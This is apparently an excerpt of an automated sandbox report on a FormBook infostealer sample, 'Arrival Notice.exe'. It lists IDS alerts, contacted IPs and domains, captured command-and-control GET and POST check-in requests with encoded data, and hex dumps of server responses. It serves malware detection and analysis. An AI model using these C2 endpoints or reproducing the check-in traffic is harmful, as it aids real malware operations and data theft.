            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61889 -> 194.9.94.85:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:61909 -> 104.21.45.56:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:61910 -> 104.21.45.56:80
            Source: Joe Sandbox ViewIP Address: 23.251.54.212 23.251.54.212
            Source: Joe Sandbox ViewIP Address: 213.145.228.16 213.145.228.16
            Source: Joe Sandbox ViewASN Name: VPSQUANUS VPSQUANUS
            Source: Joe Sandbox ViewASN Name: DOMAINTECHNIKAT DOMAINTECHNIKAT
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: LOOPIASE LOOPIASE
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0042CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0042CE44
            Source: global trafficHTTP traffic detected: GET /w6qg/?Cj=Qhv8RTO8YPvh6L30&lH=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.hprlz.czConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /qe66/?lH=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&Cj=Qhv8RTO8YPvh6L30 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.catherineviskadi.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /xzzi/?Cj=Qhv8RTO8YPvh6L30&lH=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.bfiworkerscomp.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /rm91/?Cj=Qhv8RTO8YPvh6L30&lH=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.xn--fhq1c541j0zr.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /4hda/?lH=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&Cj=Qhv8RTO8YPvh6L30 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.xn--matfrmn-jxa4m.seConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /li0t/?Cj=Qhv8RTO8YPvh6L30&lH=cVY/NretpRV3pSqaegFyh+jFAYxH5xF9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfnjThT7p1YiNwwCR+sQ8vfCBR1TGxYf2LNfg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.anuts.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ei85/?lH=ORmqfURBt40sHMHMpa9bONKIG0NKJL7I9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXnSdkLDuG3HSn8XcjXW0hCgpfinKrOJZMnTQ=&Cj=Qhv8RTO8YPvh6L30 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.telwisey.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /aroo/?Cj=Qhv8RTO8YPvh6L30&lH=bKy7FSIHmKYFjPoOU8uZGqQpeblpEQl2twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGH0ELwMgy3j7Qb0m6Rmga/hvJBmgScr7TS3s= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.sandranoll.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /tf44/?lH=zHiAY6EG+HxIxFu9b4tfleXF6yb9aKgM+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciywdLjC/RTAaKLEzmduXRfLlKkNxNmYFq4qCQ=&Cj=Qhv8RTO8YPvh6L30 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.gipsytroya.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /lfkn/?lH=gu3cG9GLpLv0C38b+jYCf7UBXt4URUEycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT+BORo/i7gxKdhtDjyoGaGd8n3Q21UEESNSU=&Cj=Qhv8RTO8YPvh6L30 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.dmtxwuatbz.ccConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.hprlz.cz
            Source: global trafficDNS traffic detected: DNS query: www.catherineviskadi.com
            Source: global trafficDNS traffic detected: DNS query: www.hatercoin.online
            Source: global trafficDNS traffic detected: DNS query: www.fourgrouw.cfd
            Source: global trafficDNS traffic detected: DNS query: www.bfiworkerscomp.com
            Source: global trafficDNS traffic detected: DNS query: www.tinmapco.com
            Source: global trafficDNS traffic detected: DNS query: www.xn--fhq1c541j0zr.com
            Source: global trafficDNS traffic detected: DNS query: www.xn--matfrmn-jxa4m.se
            Source: global trafficDNS traffic detected: DNS query: www.anuts.top
            Source: global trafficDNS traffic detected: DNS query: www.telwisey.info
            Source: global trafficDNS traffic detected: DNS query: www.sandranoll.com
            Source: global trafficDNS traffic detected: DNS query: www.gipsytroya.com
            Source: global trafficDNS traffic detected: DNS query: www.helpers-lion.online
            Source: global trafficDNS traffic detected: DNS query: www.dmtxwuatbz.cc
            Source: unknownHTTP traffic detected: POST /qe66/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usAccept-Encoding: gzip, deflate, brHost: www.catherineviskadi.comOrigin: http://www.catherineviskadi.comCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 199Referer: http://www.catherineviskadi.com/qe66/User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36Data Raw: 6c 48 3d 51 6c 48 72 66 70 53 50 44 67 78 66 5a 61 63 2b 51 6c 4e 41 73 53 42 46 62 6e 77 79 33 61 2b 72 64 6c 56 6d 4d 4e 6b 2b 49 4c 37 5a 59 72 47 4d 46 70 61 4c 66 35 6f 76 69 35 4c 39 78 6f 56 57 4f 43 42 46 78 67 58 30 61 6d 6f 4f 34 53 4c 4e 42 54 7a 6f 6f 67 61 42 6a 62 71 48 52 2b 64 78 37 67 4a 62 61 31 71 68 6a 75 57 6d 54 6f 68 6f 6b 54 4f 4e 33 6a 7a 34 4d 74 44 52 37 4b 31 73 77 67 44 6b 79 37 66 4c 71 67 65 56 52 48 69 38 6a 47 37 78 31 79 48 35 32 6f 75 51 55 4c 6e 52 37 55 78 6c 46 66 58 56 4f 54 51 50 44 66 58 7a 61 2b 36 4f 5a 53 54 41 44 36 6b 79 56 41 65 71 65 51 3d 3d Data Ascii: lH=QlHrfpSPDgxfZac+QlNAsSBFbnwy3a+rdlVmMNk+IL7ZYrGMFpaLf5ovi5L9xoVWOCBFxgX0amoO4SLNBTzoogaBjbqHR+dx7gJba1qhjuWmTohokTON3jz4MtDR7K1swgDky7fLqgeVRHi8jG7x1yH52ouQULnR7UxlFfXVOTQPDfXza+6OZSTAD6kyVAeqeQ==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 19 Aug 2024 02:26:45 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 19 Aug 2024 02:26:48 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 19 Aug 2024 02:26:50 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Mon, 19 Aug 2024 02:26:53 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 19 Aug 2024 02:35:28 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 19 Aug 2024 02:35:39 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 19 Aug 2024 02:28:51 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 